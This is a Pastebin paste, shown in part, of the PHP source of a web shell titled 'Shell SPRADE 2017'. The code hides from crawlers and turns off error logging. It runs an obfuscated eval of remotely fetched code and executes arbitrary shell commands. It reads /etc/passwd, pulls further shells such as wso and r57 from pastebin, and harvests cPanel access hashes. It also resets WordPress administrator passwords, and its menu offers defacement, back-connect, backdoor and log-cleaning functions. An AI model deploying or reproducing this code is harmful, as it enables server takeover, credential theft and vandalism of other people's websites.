0Arca

Shell SPRADE 2017

Mar 1st, 2017
616
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 345.66 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(false);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. @set_magic_quotes_runtime(0);
  12. if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) {
  13. die('HTTP/1.1 404 Not Found');
  14. exit;}
  15. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  16. @ob_clean();
  17. $file = $_GET['file'];
  18. header('Content-Description: File Transfer');
  19. header('Content-Type: application/octet-stream');
  20. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  21. header('Expires: 0');
  22. header('Cache-Control: must-revalidate');
  23. header('Pragma: public');
  24. header('Content-Length: ' . filesize($file));
  25. readfile($file);
  26. exit;}?>
  27. <?php eval(gzinflate(base64_decode(file_get_contents(str_rot13(gzinflate(str_rot13(base64_decode(('K1pCQrbS10LOWFgvyi9Y1CtVqtJCzcvSzyxYrggqWfEFAA=='))))))))); ?>
  28. <head>
  29. <title>Facebook</title>
  30. <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yl/r/H3nktOa7ZMg.ico" />
  31. <meta name='author' content='IndoXploit | Spade Pirates'>
  32. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW, NOARCHIVE" />
  33. <meta name="GOOGLEBOT" content="NOINDEX, NOFOLLOW, NOARCHIVE" />
  34. <meta charset="UTF-8">
  35. <style type='text/css'>
  36. @import url(https://fonts.googleapis.com/css?family=Abel);
  37. @import url(http://fonts.googleapis.com/css?family=Iceberg);
  38.  
  39. *, body, html{cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur863.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur863.png), default !important;}
  40. html {background: #111111;color: #ffffff;font-family: 'Iceberg';font-size: 13px;width: 100%;}
  41. li {display: inline;margin: 5px;padding: 5px;}
  42. table, th, td {border-collapse:collapse;font-family: Tahoma, Geneva, sans-serif;background: transparent;font-family: 'Iceberg';font-size: 13px;}
  43. .table_home, .th_home, .td_home {border: 1px solid #ffffff;}
  44. .table_home tr:hover {background-color: green;}
  45. .th_home tr:hover{background-color: #1a1a1a;}
  46. .wenk{color: lime;}
  47. th {padding: 10px;}
  48. a {color: #ffffff;text-decoration: none;}
  49. a:hover {color: gold;text-decoration: underline;text-shadow: 0pt 0pt 0.9em lime, 0pt 0pt 0.9em lime;color: #00ff00;text-decoration: none;}
  50. #tangina:hover{ background-color: #1a1a1a; }
  51. b {color: gold;}
  52. input[type=text], input[type=password],input[type=submit] {background: transparent;color: #ffffff;border: 1px solid #ffffff;margin: 5px auto;padding-left: 5px;
  53. font-family: 'Abel';font-size: 13px;}
  54. textarea {border: 1px solid #ffffff;width: 45%;height: 400px;padding-left: 5px;margin: 10px auto;resize: none;background: transparent;color: #ffffff;font-family: 'Abel';font-size: 13px;}
  55. select {background: transparent;color: #ffffff;border: 1px solid #ffffff;margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
  56. .but {background: transparent;color: #ffffff;border: 1px solid #ffffff;margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
  57. li a:hover{text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
  58. .th_home, .titulo {text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
  59. .board {text-align: center;border: 1px solid rgba(255,180,0,0.4);border-radius: 4px;width: 500px;}
  60. .board p {font-size: 65px;font-family: 'Monoton', cursive;color: #fff;text-transform: uppercase;padding: 0;margin: 0;}
  61.  
  62. </style>
  63. <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
  64. <script type="text/javascript" src="https://raw.githubusercontent.com/chuckyglitch/novacancy.js/master/javascript/jquery.novacancy.min.js"></script>
  65. <link href='http://fonts.googleapis.com/css?family=Monoton' rel='stylesheet' type='text/css'>
  66. <script type="text/javascript">
  67. $(document).ready(function() {$('#spade').novacancy({'reblinkProbability': 0.1,'blinkMin': 0.2,'blinkMax': 0.6,'loopMin': 8,'loopMax': 10,'color': '#ffffff','glow': ['0 0 80px #ffffff', '0 0 30px #008000', '0 0 6px #0000ff']});
  68. $('#pirates').novacancy({'blink': 1,'off': 1,'color': 'Red','glow': ['0 0 80px Red', '0 0 30px FireBrick', '0 0 6px DarkRed']});});
  69. function g(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);document.mf.submit();}
  70. </script>
  71. </head>
  72. <?php
  73. if (file_exists("php.ini")){
  74. }else{
  75. $img = fopen('php.ini', 'w');
  76. $sec = "safe_mode = OFF
  77. disable_funtions = NONE";
  78. fwrite($img ,$sec);
  79. fclose($img);}
  80. function w($dir,$perm) {
  81. if(!is_writable($dir)) {
  82. return "<font color=red>".$perm."</font>";
  83. } else {
  84. return "<font color=lime>".$perm."</font>";
  85. }
  86. }
  87. function UrlLoop($url,$type){
  88.  
  89. $urlArray = array();
  90.  
  91. $ch = curl_init();
  92. curl_setopt($ch, CURLOPT_URL, $url);
  93. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  94. $result = curl_exec($ch);
  95.  
  96. $regex='|<a.*?href="(.*?)"|';
  97. preg_match_all($regex,$result,$parts);
  98. $links=$parts[1];
  99. foreach($links as $link){
  100. array_push($urlArray, $link);
  101. }
  102. curl_close($ch);
  103.  
  104. foreach($urlArray as $value){
  105. $lol="$url$value";
  106. if(preg_match("#$type#is", $lol)) {
  107. echo "$lol\r\n";
  108. }
  109. }
  110. }
  111. if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;
  112. $b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  113. $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
  114. $ac = 0;
  115. $enc = '';
  116. $tmp_arr = array();
  117. if(!$data){return $data;
  118. }do{$o1 = charCodeAt($data, $i++);
  119. $o2 = charCodeAt($data, $i++);
  120. $o3 = charCodeAt($data, $i++);
  121. $bits = $o1 << 16 | $o2 << 8 | $o3;
  122. $h1 = $bits >> 18 & 0x3f;
  123. $h2 = $bits >> 12 & 0x3f;
  124. $h3 = $bits >> 6 & 0x3f;
  125. $h4 = $bits & 0x3f;
  126. $tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);
  127. } while ($i < strlen($data));
  128. $enc = implode($tmp_arr, '');
  129. $r = (strlen($data) % 3);
  130. return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));
  131. }function charCodeAt($data, $char){ return ord(substr($data, $char, 1));
  132. }function charAt($data, $char){return substr($data, $char, 1);
  133. }}else{function __ZW5jb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'en'.'co'.'de';
  134. return $b($s);
  135. }}if(!function_exists('b'.'a'.'se'.'6'.'4_'.'d'.'ec'.'ode')){function __ZGVjb2Rlcg($input){if(empty($input))return;
  136. $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  137. $chr1 = $chr2 = $chr3 = "";
  138. $enc1 = $enc2 = $enc3 = $enc4 = "";
  139. $i = 0;
  140. $output = "";
  141. $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
  142. do{$enc1 = strpos($keyStr, substr($input, $i++, 1));
  143. $enc2 = strpos($keyStr, substr($input, $i++, 1));
  144. $enc3 = strpos($keyStr, substr($input, $i++, 1));
  145. $enc4 = strpos($keyStr, substr($input, $i++, 1));
  146. $chr1 = ($enc1 << 2) | ($enc2 >> 4);
  147. $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
  148. $chr3 = (($enc3 & 3) << 6) | $enc4;
  149. $output = $output . chr((int) $chr1);
  150. if ($enc3 != 64) {$output = $output . chr((int) $chr2);
  151. }if ($enc4 != 64) {$output = $output . chr((int) $chr3);
  152. }$chr1 = $chr2 = $chr3 = "";
  153. $enc1 = $enc2 = $enc3 = $enc4 = "";
  154. }while($i < strlen($input));
  155. return $output;
  156. }}else{function __ZGVjb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'de'.'co'.'de';
  157. return $b($s);
  158. }}
  159.  
  160. function exe($cmd) {
  161. if(function_exists('system')) {
  162. @ob_start();
  163. @system($cmd);
  164. $buff = @ob_get_contents();
  165. @ob_end_clean();
  166. return $buff;
  167. } elseif(function_exists('exec')) {
  168. @exec($cmd,$results);
  169. $buff = "";
  170. foreach($results as $result) {
  171. $buff .= $result;
  172. } return $buff;
  173. } elseif(function_exists('passthru')) {
  174. @ob_start();
  175. @passthru($cmd);
  176. $buff = @ob_get_contents();
  177. @ob_end_clean();
  178. return $buff;
  179. } elseif(function_exists('shell_exec')) {
  180. $buff = @shell_exec($cmd);
  181. return $buff;
  182. }
  183. }
  184. function perms($file){
  185. $perms = fileperms($file);
  186. if (($perms & 0xC000) == 0xC000) {
  187. $info = 's';
  188. } elseif (($perms & 0xA000) == 0xA000) {
  189. $info = 'l';
  190. } elseif (($perms & 0x8000) == 0x8000) {
  191. $info = '-';
  192. } elseif (($perms & 0x6000) == 0x6000) {
  193. $info = 'b';
  194. } elseif (($perms & 0x4000) == 0x4000) {
  195. $info = 'd';
  196. } elseif (($perms & 0x2000) == 0x2000) {
  197. $info = 'c';
  198. } elseif (($perms & 0x1000) == 0x1000) {
  199. $info = 'p';
  200. } else {
  201. $info = 'u';
  202. }
  203. $info .= (($perms & 0x0100) ? 'r' : '-');
  204. $info .= (($perms & 0x0080) ? 'w' : '-');
  205. $info .= (($perms & 0x0040) ?
  206. (($perms & 0x0800) ? 's' : 'x' ) :
  207. (($perms & 0x0800) ? 'S' : '-'));
  208. $info .= (($perms & 0x0020) ? 'r' : '-');
  209. $info .= (($perms & 0x0010) ? 'w' : '-');
  210. $info .= (($perms & 0x0008) ?
  211. (($perms & 0x0400) ? 's' : 'x' ) :
  212. (($perms & 0x0400) ? 'S' : '-'));
  213. $info .= (($perms & 0x0004) ? 'r' : '-');
  214. $info .= (($perms & 0x0002) ? 'w' : '-');
  215. $info .= (($perms & 0x0001) ?
  216. (($perms & 0x0200) ? 't' : 'x' ) :
  217. (($perms & 0x0200) ? 'T' : '-'));
  218. return $info;
  219. }
  220. function hdd($s) {
  221. if($s >= 1073741824)
  222. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  223. elseif($s >= 1048576)
  224. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  225. elseif($s >= 1024)
  226. return sprintf('%1.2f',$s / 1024 ) .' KB';
  227. else
  228. return $s .' B';
  229. }
  230. function ambilKata($param, $kata1, $kata2){
  231. if(strpos($param, $kata1) === FALSE) return FALSE;
  232. if(strpos($param, $kata2) === FALSE) return FALSE;
  233. $start = strpos($param, $kata1) + strlen($kata1);
  234. $end = strpos($param, $kata2, $start);
  235. $return = substr($param, $start, $end - $start);
  236. return $return;
  237. }
  238. if(get_magic_quotes_gpc()) {
  239. function idx_ss($array) {
  240. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  241. }
  242. $_POST = idx_ss($_POST);
  243. }
  244. function CreateTools($names,$lokasi){
  245. if ( $_GET['create'] == $names ){
  246. $a= "".$_SERVER['SERVER_NAME']."";
  247. $b= dirname($_SERVER['PHP_SELF']);
  248. $c = "/spade_tools/".$names.".php";
  249. if (file_exists('spade_tools/'.$names.'.php')){
  250. echo '<script type="text/javascript">alert("Done");window.location.href = "spade_tools/'.$names.'.php";</script> ';
  251. }
  252. else {mkdir("spade_tools", 0777);
  253. file_put_contents('spade_tools/'.$names.'.php', file_get_contents($lokasi));
  254. echo ' <script type="text/javascript">alert("Done");window.location.href = "spade_tools/'.$names.'.php";</script> ';}}}
  255.  
  256. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  257. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  258. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  259. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  260. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  261. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  262. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  263. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  264. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  265. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  266. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  267. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  268. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  269. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  270. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  271. CreateTools("bypasssym","http://pastebin.com/raw/8ZxGbJXB");
  272. if(isset($_GET['dir'])) {
  273. $dir = $_GET['dir'];
  274. chdir($_GET['dir']);
  275. } else {
  276. $dir = getcwd();
  277. }
  278. $dir = str_replace("\\","/",$dir);
  279. $scdir = explode("/", $dir);
  280. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  281. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  282. $ds = @ini_get("disable_functions");
  283. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  284. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  285. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  286. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  287. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  288. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  289. if(!function_exists('posix_getegid')) {
  290. $user = @get_current_user();
  291. $uid = @getmyuid();
  292. $gid = @getmygid();
  293. $group = "?";
  294. } else {
  295. $uid = @posix_getpwuid(posix_geteuid());
  296. $gid = @posix_getgrgid(posix_getegid());
  297. $user = $uid['name'];
  298. $uid = $uid['uid'];
  299. $group = $gid['name'];
  300. $gid = $gid['gid'];
  301. }
  302. $d0mains = @file("/etc/named.conf");
  303. $users=@file('/etc/passwd');
  304. if($d0mains)
  305. {
  306. $count;
  307. foreach($d0mains as $d0main)
  308. {
  309. if(@ereg("zone",$d0main))
  310. {
  311. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  312. flush();
  313. if(strlen(trim($domains[1][0])) > 2)
  314. {
  315. flush();
  316. $count++;
  317. }
  318. }
  319. }
  320. }
  321. function pempem(){
  322. $OSs = exe("uname -s");
  323. $meme = exe("uname -r");
  324. return $OSs. "+" .$meme;
  325. }
  326. $sport=$_SERVER['SERVER_PORT'];
  327. echo '<div class="board" style="float: left; width: 25%;"><p id="spade">Spade</p><p id="pirates">Pirates</p></div>';
  328. echo "<table style='width:65% float: left; margin-left: 26%;' >";
  329. echo "<tr><td>System: <font color=lime>".php_uname()."</font> [<a href='https://www.google.com/?q=".pempem()."+Kernel+Exploit' target='_blank'>Google</a>] [<a href='https://www.kernel-exploits.com/kernel/?version=".exe("uname -r")."' target='_blank'>Kernel Exploit</a>]</td></tr>";
  330. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  331. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  332. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  333. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  334. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
  335. echo "<tr><td>Safe Mode: $sm</td></tr>";
  336. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  337.  
  338. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  339. echo "<tr><td>Current DIR: ";
  340. foreach($scdir as $c_dir => $cdir) {
  341. echo "<a href='?dir=";
  342. for($i = 0; $i <= $c_dir; $i++) {
  343. echo $scdir[$i];
  344. if($i != $c_dir) {
  345. echo "/";
  346. }
  347. }
  348. echo "'>$cdir</a>/ ";
  349. }
  350. echo "[ <a class='wenk' href='".$_SERVER['PHP_SELF']."'>Home</a> ]";
  351. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  352. spade@localhost:~$
  353. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  354. </form></td>";
  355. echo "<td><form method='post' action='?dir=$dir&do=mkfile'>
  356. Make File :
  357. <input type='text' size='30' height='10' name='mkfile'><input type='submit' name='makefile' value='>>'>
  358. </form></td></tr>";
  359. echo "</table><hr>";
  360. echo "<center>";
  361. echo "<ul>";
  362. echo "<li>[ <a href='" . $_SERVER["PHP_SELF"] . "'>Home</a> ]</li>";
  363. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  364. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  365. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  366. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  367. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
  368. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  369. echo "<li>[ <a href='?dir=$dir&do=dbsql'>SQL Shell</a> ]</li>";
  370. echo "<li>[ <a href='?dir=$dir&do=backconnect'>Weevely Back Connect</a> ]</li>";
  371. echo "<li>[ <a href='?dir=$dir&do=whm'>WHM Cracker</a> ]</li>";
  372. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]</li>";
  373. echo "<li>[ <a href='?dir=$dir&do=symlink2'>Symlink 2</a> ]<br></li>";
  374. /*First Layer*/
  375. echo "<li>[ <a href='?dir=$dir&do=network'>Back Connect</a> ]</li>";
  376. echo "<li>[ <a href='?dir=$dir&do=bypasser'>Bypasser</a> ]</li>";
  377. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  378. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  379. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  380. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  381. echo "<li>[ <a href='?dir=$dir&do=krdp2'>K-RDP2 Shell</a> ]</li>";
  382. echo "<li>[ <a href='?dir=$dir&do=vhost'>Bypass Vhost</a> ]</li>";
  383. echo "<li>[ <a href='?dir=$dir&do=wp-reset'>WP Reset</a> ]</li>";
  384. echo "<li>[ <a href='?dir=$dir&do=jm-reset'>JML Reset</a> ]</li><br>";
  385. /*Second Layer*/
  386. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  387. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  388. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  389. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  390. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  391. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  392. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
  393. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  394. echo "<li>[ <a href='?dir=$dir&do=endec'>Script Encode/Decode</a> ]<br></li>";
  395. /*Third Layer*/
  396. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=revs'>Revslider Config Grabber Exploit</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=whois'>WhoIs</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=dbdump'>Database Dump</a> ]</li>";
  400. echo "<li>[ <a href='?dir=$dir&do=vb'>VB Index Changer</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  403. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  404. echo "<li>[ <a href='?dir=$dir&do=python'>Python CMD</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  406. /*Fourth Layer*/
  407. echo "<li>[ <a href='?dir=$dir&do=cloudflare'>CloudFlare</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=port-scan'>Port Scan</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=hashid'>Hash ID</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=backdoor'>Install a Backdoor</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=hash'>Hash Encoder</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=mail'>Mailer</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=clear_logs'>Log Cleaner</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=kill'>Kill Me</a> ]</li>";
  416. echo "</ul>";
  417. echo "</center>";
  418. echo "<hr>";
  419. if($_GET['do'] == 'upload') {
  420. echo "<center><h1 class='titulo'>UPLOAD</h1><br>";
  421. if($_POST['upload']) {
  422. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  423. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  424. } else {
  425. $act = "<font color=red>failed to upload file</font>";
  426. }
  427. }
  428. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  429. echo $act;
  430. echo "</center>";
  431. }
  432. elseif($_GET['do'] == 'cmd') {
  433. echo "<center><h1 class='titulo'>CMD SHELL</h1></center><br><form method='post' action='?dir=$dir&do=cmd'>
  434. spade@localhost:~$
  435. <input type='text' size='30' style='border: none;' height='10' name='do_cmd'>
  436. </form><br>";
  437. if($_POST['do_cmd']) {
  438. echo "<pre>".exe($_POST['do_cmd'])."</pre>";
  439. }
  440. }elseif($_GET['do'] == 'mkfile'){
  441. echo "<center><h1 class='titulo'>MAKE FILE</h1></center>";
  442. if(isset($_POST['mkfile']) && !empty($_POST['mkfile'])){
  443. $feli = htmlspecialchars($_POST['mkfile']);
  444. $penk = fopen($feli, "a+");
  445. if($penk) {
  446. $tact = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['mkfile']."';</script>";
  447. } else {
  448. $tact = "<center><font color=red>permission denied</font></center>";
  449. }
  450. echo $tact;
  451. }
  452. }elseif($_GET['do'] == 'whm'){
  453. function pekpek($text, $something, $wenk, $i = 1){
  454. $ar0 = explode($something, $text);
  455. $ar1 = explode($wenk, $ar0[$i]);
  456. return trim($ar1[0]);
  457. }
  458. echo "<center><h1 class=titulo>Auto WHM Cracker</h1><br>";
  459. $d0mains = @file("/etc/named.conf");
  460. $domains = scandir("/var/named");
  461. if($domains or $d0mains){
  462. $domains = scandir("/var/named");
  463. if($domains){
  464. echo "<table><tr><th>Count</th><th>Domain</th><th>User</th><th> | </th><th>Access Hash</th></tr>";
  465. $count = 1;
  466. $dc = 0;
  467. $list = scandir("/var/named");
  468. foreach($list as $domain){
  469. if(strpos($domain, ".db")){
  470. $domain = str_replace(".db", "", $domain);
  471. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  472. $dirz = "/home".$owner['name']."/.accesshash";
  473. $path = getcwd();
  474. if(is_readable($dirz)){
  475. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  476. $fvck = file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  477. $pword = pekpek($fvck, 'password="','"');
  478. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2086 target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$pword."</td><td><a href='".$owner['name'].".txt' target='_blank' >Click Me!</a></td></tr>";
  479. $dc++;
  480. }
  481. }
  482. }
  483. echo "</table>";
  484. $total = $dc;
  485. echo "<br><font color=lime>TOTAL WHM FOUND :: </font><font color=yellow>".$total."</font>";
  486. }else{
  487. $d0mains = @file("/etc/named.conf");
  488. if($d0mains){
  489. echo "<table><tr><th>Count</th><th>Domain</th><th>User</th><th> | </th><th>Access Hash</th></tr>";
  490. $count = 1;
  491. $dc = 0;
  492. $menk = array();
  493. foreach($d0mains as $d0main){
  494. if(@eregi('zone', $d0main)){
  495. preg_match_all('#zone "(.*)"#', $d0main, $domain);
  496. flush();
  497. if(strlen(trim($domain[1][0])) > 2){
  498. $menk = $domain[1][0];
  499. }
  500. }
  501. }
  502. $menk = array_unique($menk);
  503. $user = array();
  504. $damn = array();
  505. foreach($menk as $penk){
  506. $infos = @posix_getpwuid(fileowner("/etc/valiases/", $penk));
  507. $user[] = $infos['name'];
  508. $damn[] = $penk;
  509. }
  510. array_multisort($user, $damn);
  511. $datas = file("/etc/passwd");
  512. $passwd = array();
  513. foreach($datas as $satad){
  514. $roar = explode(':', $satad);
  515. if(strpos($roar[5], 'home')){
  516. $passwd[$roar[0]] = $roar[5];
  517. }
  518. }
  519. $lelz = 0;
  520. $jogabelz = 1;
  521. foreach($user as $resu){
  522. $dirz = '/home/'.$resu.'/.accesshash';
  523. $path = getcwd();
  524. if(is_readable($dirz)){
  525. copy($dirz, ''.$path.'/'.$resu.'.txt');
  526. $puke = file_get_contents(''.$path.'/'.$resu.'.txt');
  527. $pass = pekpek($puke, 'password="', '"');
  528. echo "<tr><td>".$count++."</td><td><a href='http://".$damn[$jogabelz - 1]."/' target='_blank'>".$damn[$jogabelz - 1]."</a></td><td>".$resu."</td><td>".$pass."</td><td><a href='".$resu.".txt' target='_blank' >Click Me!</a></td></tr>";
  529. $dc++;
  530. flush();
  531. $lelz = $lelz ? 0 : 1;
  532. $jogabelz++;
  533. }
  534. }
  535. }
  536. echo "</table>";
  537. $total = $dc;
  538. echo "<br><font color=lime>TOTAL WHM FOUND :: </font><font color=yellow>".$total."</font>";
  539. }
  540. }else{
  541. echo "<font color=red>ERROR /var/named or /etc/named.conf NOT ACCESSIBLE!</font>";
  542. }
  543. echo "</center>";
  544. }elseif ($_GET['do'] == 'wp-reset') {
  545. echo "<center/><br/><form action='' method='post'><h1 class='titulo'>WORDPRESS RESET PASSWORD</h1><br>";
  546. if (empty($_POST['pwd'])) {
  547. $puta = "\$P\$BMDbmkm1fUU4U6fm/DFqEnxrUuNrki/";
  548. echo "<FORM method='POST'>
  549. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr>
  550. <tr><td>Hostname: <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  551. <tr><td>Database: <input style='width:270px;' class='inputz' type='text' name='database' value='wp-' /></td></tr>
  552. <tr><td>DB Username: <input style='width:270px;' class='inputz' type='text' name='username' value='wp-' /></td></tr>
  553. <tr><td>DB Password: <input style='width:270px;' class='inputz' type='text' name='password' value='***' /></td></tr>
  554. <tr><td>Username: <input style='width:270px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
  555. <tr><td>Password: <input style='width:270px;' class='inputz' type='text' name='pwd' value='".FILTER_VAR(htmlspecialchars($puta), FILTER_SANITIZE_STRING)."' /></td><tr><td>
  556. <input style='width:220px;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  557. </td></tr> </table><br>";
  558. } else {
  559. $localhost = $_POST['localhost'];
  560. $database = $_POST['database'];
  561. $username = $_POST['username'];
  562. $password = $_POST['password'];
  563. $pwd = $_POST['pwd'];
  564. $admin = $_POST['admin'];
  565. @mysql_connect($localhost, $username, $password) or die(mysql_error());
  566. @mysql_select_db($database) or die(mysql_error());
  567. //$hash = crypt($pwd);
  568. $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 1") or die(mysql_error());
  569. $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $pwd . "' WHERE ID = 1") or die(mysql_error());
  570. $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 2") or die(mysql_error());
